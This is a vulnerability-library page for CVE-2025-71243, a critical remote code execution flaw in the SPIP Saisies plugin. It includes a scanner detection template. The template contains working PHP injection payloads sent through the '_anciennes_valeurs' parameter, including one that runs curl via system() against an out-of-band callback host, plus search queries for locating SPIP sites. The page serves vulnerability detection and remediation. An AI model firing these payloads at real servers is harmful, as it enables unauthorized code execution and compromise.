/Vulnerability Library

SPIP Saisies - Remote Code Execution

CVE-2025-71243
Verified

Description

SPIP Saisies plugin 5.4.0 through 5.11.0 contains a remote code execution caused by an unspecified flaw, letting attackers execute arbitrary code on the server, exploit requires no special conditions.

Severity

Critical

CVSS Score

9.8

Exploit Probability

5%

Affected Product

saisies

Published Date

February 22, 2026

Template Author

omarkurt

CVE-2025-71243.yaml
id: CVE-2025-71243

info:
  name: SPIP Saisies - Remote Code Execution
  author: omarkurt
  severity: critical
  description: |
    SPIP Saisies plugin 5.4.0 through 5.11.0 contains a remote code execution caused by an unspecified flaw, letting attackers execute arbitrary code on the server, exploit requires no special conditions.
  remediation: |
    Update to version 5.11.1 or later.
  impact:
    Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  reference:
    - https://vulnerability.circl.lu/vuln/cve-2025-71243
    - https://chocapikk.com/posts/2026/spip-saisies-rce/
    - https://github.com/Chocapikk/CVE-2025-71243
    - https://vulnerabletarget.com/VT-2025-71243
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-71243
    epss-score: 0.05126
    epss-percentile: 0.91378
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 3
    vendor: spip
    product: saisies
    shodan-query: 'http.html:"SPIP"'
    fofa-query: 'app="SPIP"'
  tags: cve,cve2025,spip,rce,oast,vkev

variables:
  rce_payload: "x'/><?php echo md5('{{randstr}}'); ?><input value='x"
  oob_payload: "x'/><?php gethostbyname('{{interactsh-url}}'); ?><input value='x"
  oob_curl: "x'/><?php system('curl+-s+{{interactsh-url}}'); ?><input value='x"

flow: http(1) && (http(2) || http(3) || http(4))

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "Composed-By: SPIP")'
          - 'contains(header, "X-Spip-Cache:")'
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(rce_payload)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{md5(randstr)}}")'
          - 'status_code == 200'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_payload)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_curl)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502200b71e32500b26803c7e29f69dbf99dc0efdda6faccb20badc187d1f9fcd867a0022100cbcda7fdd26c47d8ec87ab2c3e93e9982368c11b7c9adad95d45a851873f0fa5:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-71243
CWE ID:
cwe-94

References

https://vulnerability.circl.lu/vuln/cve-2025-71243https://chocapikk.com/posts/2026/spip-saisies-rce/https://github.com/Chocapikk/CVE-2025-71243https://vulnerabletarget.com/VT-2025-71243

Remediation Steps

Update to version 5.11.1 or later.